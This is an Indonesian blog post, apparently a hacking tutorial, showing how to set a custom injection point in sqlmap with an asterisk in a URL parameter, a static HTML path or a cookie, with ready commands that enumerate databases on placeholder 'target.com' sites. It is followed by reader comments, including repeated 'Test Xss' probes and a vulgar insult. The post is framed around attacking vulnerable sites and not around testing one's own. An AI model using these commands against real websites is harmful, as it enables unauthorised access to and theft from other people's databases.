Menentukan Inject Point pada SQLmap. Kita sering melihat tutorial bagaimana menginjeksi url yang vuln. Namun rata-rata tutorial yang diberikan adalah basic sqlmap dimana inject pointnya selalu sama yakni target.com/a.php?b=1. Nah, bagaimana jika inject pointnya berbeda? Di Sqlmap kita bisa menentukan inject pointnya.
Misalnya begini:
https://target.com/article.php?page=2&id=5
Dan inject pointnya ada di parameter id. Maka perintahnya
sqlmap -u "https://target.com/article.php?page=2&id=5*" --dbs
Ya, hanya dengan menambahkan karakter * di inject point. Hal ini juga berlaku jika yang diinject adalah halaman statis html. Misalnya vuln di
https://target.com/article-315'-abcde.html
Maka di sqlmap perintahnya
sqlmap -u "https://target.com/article-315*-abcde.html" --dbs
Begitu juga dengan sqlmap post data, inject pointnya bisa ditentukan, misalnya
sqlmap -u "http://targeturl" --cookie="param1=value1*;param2=value2"
- referensi : https://miloserdov.org/?p=879
min, kalo mau belajar dari dasar banget, liat dari artikel yang mana ya?
Test Xss
Test Xss
Test Xss
Kalo yg diketahui cuman admin.php nya aja min?
kontol lu mmk jembdot